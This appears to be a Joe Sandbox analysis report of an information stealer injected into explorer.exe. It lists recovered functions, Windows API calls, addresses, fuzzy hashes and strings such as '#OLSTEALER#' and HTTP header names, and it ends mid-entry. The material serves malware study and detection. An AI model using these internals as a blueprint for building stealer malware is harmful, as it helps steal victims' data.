RtlLeaveCriticalSection.NTDLL(01599448), ref: 01551B8B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalSection$AllocateEnterEventHeapLeaveSleeplstrcpylstrlen
String ID:
API String ID: 4086684245-0
Opcode ID: b82cdd33c8abed2872b1a3a57ee0fe8c7e67c6937a4863b9dfc0647179590c14
Instruction ID: 5c46e6756bb468a57590dbc536ee9a2a3a15519dc7c02352aa40079e728ecc9a
Opcode Fuzzy Hash: b82cdd33c8abed2872b1a3a57ee0fe8c7e67c6937a4863b9dfc0647179590c14
Instruction Fuzzy Hash: 75118275501218BBE7619F68DC49F5A3F68FB05764F024111FE19AF198E7708908EB92

Uniqueness

Uniqueness Score: -1,00%

Function 01563B77, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 01563B90
_allshl.NTDLL ref: 01563BA8
_aullshr.NTDLL ref: 01563BB6
LocalAlloc.KERNEL32(00000040,00000010), ref: 01563BC9
RtlLeaveCriticalSection.NTDLL(?), ref: 01563BF0

Strings

?, xrefs: 01563B96

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalSection$AllocEnterLeaveLocal_allshl_aullshr
String ID: ?
API String ID: 3564996772-1684325040
Opcode ID: aadb356eecfe4b705df5b6c5085cb3d31e4357dafd3e73d36c0d04e4ebafd0ca
Instruction ID: 47f325aa26fe5b46ab272a487a703e2fc5a05e1091a6ef287612419dd7808546
Opcode Fuzzy Hash: aadb356eecfe4b705df5b6c5085cb3d31e4357dafd3e73d36c0d04e4ebafd0ca
Instruction Fuzzy Hash: D711A0B5A00209EFCB10DFA8C48599DFBF5FF48340B10846AE5849B210D730A940DF90

Uniqueness

Uniqueness Score: -1,00%

Function 015573E6, Relevance: 9.2, APIs: 6, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01556ED3: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000), ref: 01556EEE

RtlAllocateHeap.NTDLL(00000000,00001000), ref: 0155745A
ResetEvent.KERNEL32(?), ref: 0155746E
GetLastError.KERNEL32 ref: 01557489
HeapFree.KERNEL32(00000000,?), ref: 015574D8
RtlAllocateHeap.NTDLL(00000000,000000C9), ref: 01557547

Part of subcall function 015570BF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 015570F7

SetEvent.KERNEL32(?,0000EA60,00000000,00000000,?,0159A429,?,00000000,?,?,00000000,?,00000001,00000000,00000000), ref: 01557596

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Allocate$Event$ErrorFreeLastMultipleObjectsResetWait
String ID:
API String ID: 935950646-0
Opcode ID: 6236636d76e412f410b66e00648ae3ba439ae4b0ad5df37f7acae48c1d9cde3e
Instruction ID: a7e62740f04da3ecf460445cbd2d539a41485df2a07858674dcbfb0553a7fabf
Opcode Fuzzy Hash: 6236636d76e412f410b66e00648ae3ba439ae4b0ad5df37f7acae48c1d9cde3e
Instruction Fuzzy Hash: 09515E75900249EFDF61CFA8C8949AEBFB9FB48344F60846AF905DB250D7309A84DF60

Uniqueness

Uniqueness Score: -1,00%

Function 01557122, Relevance: 9.1, APIs: 6, Instructions: 139memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,00000000,00000000,00000000,00000000,?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008), ref: 01557131
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01557147
ResetEvent.KERNEL32(?,?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008,00000000,?,?,?,015575DE), ref: 015571A1
GetLastError.KERNEL32(?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008,00000000,?,?,?,015575DE,?), ref: 015571CF
GetLastError.KERNEL32(?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008,00000000,?,?,?,015575DE,?), ref: 01557280
HeapFree.KERNEL32(00000000,00000000), ref: 01557297

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 4c66d6c6481741ea244901cdc3e51a3358c232891b46a2ae71363c27a0b42857
Instruction ID: f237b6a1c8e7ff962f1925fff333da83ed6b97fde5feeeb882b24e5c84876dc8
Opcode Fuzzy Hash: 4c66d6c6481741ea244901cdc3e51a3358c232891b46a2ae71363c27a0b42857
Instruction Fuzzy Hash: 14418E71100208BFEB718F68DC89EAF7BADFB08790F414529FA15DA1A0D7719D489B61

Uniqueness

Uniqueness Score: -1,00%

Function 01552894, Relevance: 9.1, APIs: 6, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 015528BD
memcpy.NTDLL(00000000,?,?,?,?,0155401E,?,00000000,00000000,?,?,?,?,01598FD4), ref: 015528D1
HeapFree.KERNEL32(00000000,?,01598FD4), ref: 0155292E
HeapFree.KERNEL32(00000000,?,01598FD4), ref: 01552966
HeapFree.KERNEL32(00000000,?,01598FD4), ref: 0155297E
HeapFree.KERNEL32(00000000,?,00000000), ref: 015529F0

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$Allocatememcpy
String ID:
API String ID: 2128805904-0
Opcode ID: 0f6a65561b5d905af07e9cd242680ae72ac85824e48ce3caaae2a6c640e2a1de
Instruction ID: 7468e0ad34629adf15e750d0e6d6553f8cbb3dbbec3f3dd2b98e0a55cad1c2b9
Opcode Fuzzy Hash: 0f6a65561b5d905af07e9cd242680ae72ac85824e48ce3caaae2a6c640e2a1de
Instruction Fuzzy Hash: 38413370601226EFDBA1CF18D994AAABFB5FF04790B054016ED09DB714C771E8A4DBE1

Uniqueness

Uniqueness Score: -1,00%

Function 0154775A, Relevance: 9.1, APIs: 6, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 01547784
lstrcpy.KERNEL32(00000000,?), ref: 01547799
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 015477A3
GetFileAttributesA.KERNEL32(?), ref: 015477C2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateAttributesFileHeaplstrcpy
String ID:
API String ID: 1077275918-0
Opcode ID: 86f245e4b95ef78f5d995aab7b407e1b3f825fe31cad8ed899ec7c1c5fecb039
Instruction ID: f45afb8225db2ea6ab286ae9ae851d0658812afaa2857a0b4d0b7e5aa3266ca7
Opcode Fuzzy Hash: 86f245e4b95ef78f5d995aab7b407e1b3f825fe31cad8ed899ec7c1c5fecb039
Instruction Fuzzy Hash: 75319071105309AFE621AF69DC45F1F7FACFF99608F020429F944AB251DBB199089BA2

Uniqueness

Uniqueness Score: -1,00%

Function 0155152C, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000200,#OLSTEALER#,?,?,00000000,01551635,?,?,00000000,?,?,?,01542787), ref: 0155155B
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,01551635,?,?,00000000,?,?,?,01542787), ref: 01551566
wsprintfA.USER32 ref: 01551575
LocalFree.KERNEL32(00000000,?,80000001,00000000), ref: 0155158B
LocalFree.KERNEL32(00000000,?,80000001,00000000), ref: 01551596

Part of subcall function 01563938: LocalFree.KERNEL32(00000000,80000002,0156EB4C,0156EB44,00000000,00000000,?,?,?,0155153E,00000200,#OLSTEALER#,?,?,00000000,01551635), ref: 01563982

Strings

#OLSTEALER#, xrefs: 01551533

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$Free$Alloclstrlenwsprintf
String ID: #OLSTEALER#
API String ID: 3762541245-2638593822
Opcode ID: d3c5d1e60f7f37d42dd27a1ff1e91838e516a878264a1208e8133b2ba589a032
Instruction ID: 56dd00e682e317004a468f5c129e7f83b0079d1806902e819b2adb60eecabaaf
Opcode Fuzzy Hash: d3c5d1e60f7f37d42dd27a1ff1e91838e516a878264a1208e8133b2ba589a032
Instruction Fuzzy Hash: 0511E33D2827167AE3A0762A0CDBF6B2D2CFEB1964B05542ABE0FAF107C964540586F1

Uniqueness

Uniqueness Score: -1,00%

Function 01544097, Relevance: 9.1, APIs: 6, Instructions: 57fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0154409E
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 015440B6
GetFileSize.KERNEL32(00000000,00000000), ref: 015440C5
CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 015440D6
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 015440E9
CloseHandle.KERNEL32(?), ref: 0154410B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$Create$CloseHandleMappingSizeViewmemset
String ID:
API String ID: 468759643-0
Opcode ID: 53c3cde37a2821758efa4d663da9791783c25f4037204d5518126738b82f04bc
Instruction ID: 4210216f8acf6ea880bdc6bd21cf2d9000a01777e52770f4705b676ec3332871
Opcode Fuzzy Hash: 53c3cde37a2821758efa4d663da9791783c25f4037204d5518126738b82f04bc
Instruction Fuzzy Hash: 6D016D74101281FBE6305F2ADC4EE0BBEB9EBD6B24F10491DF2A59A0A0C7308444DB70

Uniqueness

Uniqueness Score: -1,00%

Function 01554E68, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100000,00000000), ref: 01554E96
CreateEventA.KERNEL32(01599084,00000001,00000000), ref: 01554EB1
GetLastError.KERNEL32 ref: 01554EBE
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01554ED1
CloseHandle.KERNEL32(?), ref: 01554EDC
InterlockedDecrement.KERNEL32(01598E44), ref: 01554EEC

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Event$CloseCreateDecrementErrorHandleInterlockedLastMultipleObjectsOpenWait
String ID:
API String ID: 595090500-0
Opcode ID: 333e226d2933674542863245a717ca3d565f11c60a7195834bfd687449c8b73b
Instruction ID: c65d83d8f731e69e1006d5937fb2a5f0ac69a315583685b2e303fb5f3af3434d
Opcode Fuzzy Hash: 333e226d2933674542863245a717ca3d565f11c60a7195834bfd687449c8b73b
Instruction Fuzzy Hash: 6E116B31705105BFCF608FAD9C09A4EBBFAFB85331B12011AF525DB194E7704844EB62

Uniqueness

Uniqueness Score: -1,00%

Function 01560835, Relevance: 9.0, APIs: 6, Instructions: 42COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,015415DA), ref: 01560845
GetVersion.KERNEL32(?,?,015415DA), ref: 01560850
GetCurrentProcessId.KERNEL32(?,?,015415DA), ref: 0156085B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,015415DA), ref: 0156086B
GetLastError.KERNEL32(?,?,015415DA), ref: 0156087A
CloseHandle.KERNEL32(01599004), ref: 015608A6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Handle$CloseCreateCurrentErrorEventLastModuleProcessVersion
String ID:
API String ID: 3679181387-0
Opcode ID: b021ef0ae94cf1bdeaab040d9c449d3a524ba3b318db7a051eab271fa79604aa
Instruction ID: 0303bf3f88a1e6be52ecb479b0b787986b4ca48524b66c909e0bb40ea40b3856
Opcode Fuzzy Hash: b021ef0ae94cf1bdeaab040d9c449d3a524ba3b318db7a051eab271fa79604aa
Instruction Fuzzy Hash: 8801FB359012619BC730AB6EA84D85ABEBAFBD6B11303151AF531DF158E7704448ABE1

Uniqueness

Uniqueness Score: -1,00%

Function 0154D02C, Relevance: 9.0, APIs: 7, Instructions: 227COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0154D14A
memcpy.NTDLL(?,?,00000004), ref: 0154D184
memset.NTDLL ref: 0154D1A5
memcpy.NTDLL(?,?,?,?,?,?), ref: 0154D1BE
LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 0154D202

Part of subcall function 0154CC6C: LocalAlloc.KERNEL32(00000040,00000000,0154F060,00000000,?,?,0154F0A6,00000000,00000000,00000061,?,00000000,?,?,?), ref: 0154CC72

memset.NTDLL ref: 0154D228

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memset$Localmemcpy$AllocFree
String ID:
API String ID: 3868825233-0
Opcode ID: d5bb89304814374eb7e4292ec1cac4286a68d4aaf1e74434bb52e44e8f139388
Instruction ID: a53a5a7b03298899fdf80d2ebf75f22d4d3c049df5c9de1b0ab11f0330e4e370
Opcode Fuzzy Hash: d5bb89304814374eb7e4292ec1cac4286a68d4aaf1e74434bb52e44e8f139388
Instruction Fuzzy Hash: 51916B74A0020ADFDF11DFA8C880BAEBBB1FF55318F148469E959AF246D775D901CBA0

Uniqueness

Uniqueness Score: -1,00%

Function 015482F5, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,01550767), ref: 01548348
lstrcpy.KERNEL32(00000000,01550767), ref: 01548352
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01548443
HeapFree.KERNEL32(00000000,00000000), ref: 0154845B

Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0154FA79
Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0154FA92
Part of subcall function 0154FA44: HeapFree.KERNEL32(00000000,?), ref: 0154FAFF
Part of subcall function 0154FA44: HeapFree.KERNEL32(00000000,?), ref: 0154FB0F
Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,?), ref: 0154FB22
Part of subcall function 0154FA44: RtlAllocateHeap.NTDLL(00000000,?), ref: 0154FB35

Strings

http, xrefs: 015483F5, 01548408

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Allocate$Free$lstrcpy
String ID: http
API String ID: 3371478684-2541227442
Opcode ID: f20ad4c9aae705c71dc92e16a132a0c4bfb21bcd85472ac98fc536d501c08d05
Instruction ID: 61c7633b6c3d184f6c41903553ac01fb65a86e01b88d443438875e49a8b2aafc
Opcode Fuzzy Hash: f20ad4c9aae705c71dc92e16a132a0c4bfb21bcd85472ac98fc536d501c08d05
Instruction Fuzzy Hash: B0518B75900209BFEF22DFA8CC44BBE7BB9FB45318F150065E914AB261DB71AD04EB61

Uniqueness

Uniqueness Score: -1,00%

Function 0154F390, Relevance: 8.9, APIs: 7, Instructions: 146COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,00000059,00000008,0156E0D8,?,00000061), ref: 0154F4A4
LocalFree.KERNEL32(00000061,00000061,?,0154DFC1,00000061,0156E0D8,?,00000061,?,?,?,0154F301,0154DFC1,?,00000061), ref: 0154F3C2

Part of subcall function 0154D3D7: memcpy.NTDLL(0154F4BA,0154F4BA,00000004,?,0154F4BA,00000059,0156E0D8,?,00000061), ref: 0154D3E3

memcpy.NTDLL(?,00000061,00000008,00000061,?,0154DFC1,00000061,0156E0D8,?,00000061,?,?,?,0154F301,0154DFC1,?), ref: 0154F3D9
memcpy.NTDLL(?,00000059,00000008,0156E0D8,?,00000061), ref: 0154F40B
LocalFree.KERNEL32(00000061,0156E0D8,?,00000061), ref: 0154F441
LocalFree.KERNEL32(00000061,?,0154F301,?,00000059,0156E0D8,?,00000061), ref: 0154F483
LocalFree.KERNEL32(?,?,0154F301,?,00000059,0156E0D8,?,00000061), ref: 0154F519

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeLocalmemcpy
String ID:
API String ID: 1048201381-0
Opcode ID: 219ddb2a09dd64a72ca0a71e8bb1a872e9094a628759789243c87ab46f713ef3
Instruction ID: 019125525306c211e5b8cbbcc0ee35b040599471db51cb700239ce5eba3589bd
Opcode Fuzzy Hash: 219ddb2a09dd64a72ca0a71e8bb1a872e9094a628759789243c87ab46f713ef3
Instruction Fuzzy Hash: 3E516A7A90021AABDF11AF9CDC449EE7BB5FF48318F004462E911BB150DB319A95DBE0

Uniqueness

Uniqueness Score: -1,00%

Function 0154CCA3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0154CCBB
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0154CCD9
CloseHandle.KERNEL32 ref: 0154CD03
CloseHandle.KERNEL32 ref: 0154CE0F

Strings

!BDN, xrefs: 0154CD0B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CloseHandle$CreateFilememset
String ID: !BDN
API String ID: 3934282195-1336256639
Opcode ID: 5ec3b834650fa164f334a431920bdbee58724897458001f4a8a590ee1277592d
Instruction ID: 22772ee00712facb7260c4dc17fcab48f90b4a28e8d7b00e9d145895f44e7df6
Opcode Fuzzy Hash: 5ec3b834650fa164f334a431920bdbee58724897458001f4a8a590ee1277592d
Instruction Fuzzy Hash: BD41C3B1602750AFE7319B2DCC45B2BBAE8FFD5718F000A2FE19ADA690D77094408B51

Uniqueness

Uniqueness Score: -1,00%

Function 0156A359, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106timeCOMMON

Download Yara Rule

APIs

Part of subcall function 015692FA: InterlockedIncrement.KERNEL32(?), ref: 0156934B
Part of subcall function 015692FA: RtlLeaveCriticalSection.NTDLL(01598F58), ref: 015693D6

OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 0156A3AE
CloseHandle.KERNEL32(?), ref: 0156A3CF
GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,0000001C), ref: 0156A3DC
GetSystemTimeAsFileTime.KERNEL32(00000008,00000014,?,00000000,?,0000001C), ref: 0156A457

Strings

o, xrefs: 0156A43A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Time$FileSystem$CloseCriticalHandleIncrementInterlockedLeaveOpenProcessSection
String ID: o
API String ID: 1039004260-252678980
Opcode ID: 22e6f6fec200d924be75725499c1ffba5e634b8c1de4ccbd4a7bd051b99f2f31
Instruction ID: b218fb99dd0b91c3a6eb1f3690b0f0eda55a7952b0fdfd09c654e15216e56e2a
Opcode Fuzzy Hash: 22e6f6fec200d924be75725499c1ffba5e634b8c1de4ccbd4a7bd051b99f2f31
Instruction Fuzzy Hash: 9A41C3B0600606EFEB15CF69C888B99BBF8FF48701F118129E619AF250E770E545CBD5

Uniqueness

Uniqueness Score: -1,00%

Function 0154AD3B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0154AD99
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0154ADE8

Part of subcall function 0155FEBB: GetLastError.KERNEL32 ref: 0155FF06
Part of subcall function 0155FEBB: WaitForSingleObject.KERNEL32(000000C8), ref: 0155FF2B
Part of subcall function 0155FEBB: SetFilePointer.KERNEL32(00000008,00000000,00000000,00000002), ref: 0155FF74
Part of subcall function 0155FEBB: WriteFile.KERNEL32(00000008,00001388,?,00000002,00000000), ref: 0155FF89
Part of subcall function 0155FEBB: SetEndOfFile.KERNEL32(00000008), ref: 0155FF96
Part of subcall function 0155FEBB: CloseHandle.KERNEL32(00000008), ref: 0155FFAE

HeapFree.KERNEL32(00000000,00000000,?), ref: 0154AE1D
HeapFree.KERNEL32(00000000,?), ref: 0154AE2D

Strings

https://, xrefs: 0154AD4B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$File$AllocateFree$CloseErrorHandleLastObjectPointerSingleWaitWrite
String ID: https://
API String ID: 2164351065-4275131719
Opcode ID: 01ac836f71e7e6fcbf7a8b175f32cc1e76ddf2d382c4bc5c821a097f4b6a9219
Instruction ID: f8c0a755e1133f4d9abe3993636140960c2a7bfd6a2e334ac489544e3c476296
Opcode Fuzzy Hash: 01ac836f71e7e6fcbf7a8b175f32cc1e76ddf2d382c4bc5c821a097f4b6a9219
Instruction Fuzzy Hash: 7B316CB691101ABFEB209FA8DC89CAEBB7DFF083547110065F515DB220D771AE54EBA0

Uniqueness

Uniqueness Score: -1,00%

Function 0154B154, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0154B17D
HeapFree.KERNEL32(00000000,00000000), ref: 0154B229
HeapFree.KERNEL32(00000000,?), ref: 0154B249
HeapFree.KERNEL32(00000000,00000000), ref: 0154B257

Strings

https://, xrefs: 0154B1A5

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: 195bace6d14d3972fef410a4fcaae1867f07d167c37676daace0d040552e8ab2
Instruction ID: 44b33b7d093b712ce355e6bd50bf5d847269fbc1169907caca152eefc88d6d87
Opcode Fuzzy Hash: 195bace6d14d3972fef410a4fcaae1867f07d167c37676daace0d040552e8ab2
Instruction Fuzzy Hash: 6D31C071401208BFEB219F69DC48FAE7E7AFB85B18F014029F918AE155D672C944EB61

Uniqueness

Uniqueness Score: -1,00%

Function 01553885, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 015538AC
lstrcpy.KERNEL32(00000000,-00000002), ref: 015538DB

Part of subcall function 015481C8: RtlAllocateHeap.NTDLL(00000000,?), ref: 0154827D
Part of subcall function 015481C8: memcpy.NTDLL(00000000,00000002,?,?,?,?), ref: 0154828E
Part of subcall function 015481C8: memcpy.NTDLL(00000000,00000001,00000001,?,?,?,?,?,?), ref: 015482A4
Part of subcall function 015481C8: memcpy.NTDLL(00000000,?,?,00000000,00000001,00000001,?,?,?,?,?,?), ref: 015482B6
Part of subcall function 015481C8: memcpy.NTDLL(00000000,0156E5D4,00000002,00000000,?,?,00000000,00000001,00000001,?,?,?,?,?,?), ref: 015482C9
Part of subcall function 015481C8: memcpy.NTDLL(00000000,00000000,00000002,?,?,?,?,?,?), ref: 015482DE

Strings

Content-Length:, xrefs: 01553902
Referer: , xrefs: 01553944
Host:, xrefs: 01553922

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$AllocateHeap$lstrcpy
String ID: Content-Length:$Host:$Referer:
API String ID: 181103502-2656112538
Opcode ID: 3f315375c3e89ba1834698260b192864e82a615f020e9000d07eaa25601d525a
Instruction ID: 60a59616ef31ead6d6589df71c0b8a31fbcc277a447096eb866617412ef57c9b
Opcode Fuzzy Hash: 3f315375c3e89ba1834698260b192864e82a615f020e9000d07eaa25601d525a
Instruction Fuzzy Hash: E4218E76001219BF9F606F69DCC0CAE7F7DFE452E43068026F908EB220C6719D449BA1

Uniqueness

Uniqueness Score: -1,00%

Function 01543477, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 015434AC
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 015434CC

Strings

XxX0, xrefs: 015434E3
XxXx, xrefs: 01543503
XxXx, xrefs: 015434E8

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Time$FileSystem_aulldiv
String ID: XxX0$XxXx$XxXx
API String ID: 2806457037-2087141317
Opcode ID: 255b2f015f65c63f5de63aa4e39108fd49073db1dd81e916226687e5c6cc59c1
Instruction ID: 1cf2eb968580d1019390ea05b638603305bee66090e47c7bd813615eb0ebd038
Opcode Fuzzy Hash: 255b2f015f65c63f5de63aa4e39108fd49073db1dd81e916226687e5c6cc59c1
Instruction Fuzzy Hash: 3B1157B5A00223ABCF52DF68D8C49EDB7E8FB8026CB28483AD506DB611E734D441CBD0

Uniqueness

Uniqueness Score: -1,00%

Function 0155733B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 015572D5: lstrlen.KERNEL32(00000000,00000008,00000000,01557352,00000000,?,00000008,00000000,?,?,?,015575DE,?,0159A429,?,00000000), ref: 015572DA
Part of subcall function 015572D5: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 015572EB
Part of subcall function 015572D5: lstrcpy.KERNEL32(00000000,00000000), ref: 015572FA

GetLastError.KERNEL32(?,?,?,015575DE,?,0159A429,?,00000000,?,?,00000000,?,00000001,00000000,00000000), ref: 0155739F
SetEvent.KERNEL32(?,?,?,?,015575DE,?,0159A429,?,00000000,?,?,00000000,?,00000001,00000000,00000000), ref: 015573B4
GetLastError.KERNEL32(00000000,?,00000008,00000000,?,?,?,015575DE,?,0159A429,?,00000000,?,?,00000000,?), ref: 015573C1
HeapFree.KERNEL32(00000000,00000000), ref: 015573D8

Part of subcall function 01557122: lstrlen.KERNEL32(?,00000008,00000000,00000000,00000000,00000000,?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008), ref: 01557131
Part of subcall function 01557122: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01557147
Part of subcall function 01557122: ResetEvent.KERNEL32(?,?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008,00000000,?,?,?,015575DE), ref: 015571A1
Part of subcall function 01557122: GetLastError.KERNEL32(?,01557378,00000000,?,0159A472,?,0000EA60,00000000,?,00000008,00000000,?,?,?,015575DE,?), ref: 015571CF

Strings

GET, xrefs: 01557368

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorHeapLast$AllocateEventlstrlen$FreeResetlstrcpy
String ID: GET
API String ID: 548668728-1805413626
Opcode ID: 5f7a3b7aaa6b0a98732f51a5cc2bb9e61d0b71d5e580c30bf5dedb8eeaf7d29a
Instruction ID: c393aa240a3d37b8f5f23c62fc98a09bc661e389f034410ba1e9936ad3a535be
Opcode Fuzzy Hash: 5f7a3b7aaa6b0a98732f51a5cc2bb9e61d0b71d5e580c30bf5dedb8eeaf7d29a
Instruction Fuzzy Hash: D811E675200108BFDB619F69DC89C5E3FAAFB883707124525FD058B161D6319D44AB60

Uniqueness

Uniqueness Score: -1,00%

Function 0156A510, Relevance: 7.7, APIs: 5, Instructions: 171timestringCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0156A510
lstrlen.KERNEL32(?), ref: 0156A5E0
FileTimeToLocalFileTime.KERNEL32(00000008,?), ref: 0156A631
FileTimeToSystemTime.KERNEL32(?,?), ref: 0156A641

Memory Dump Source

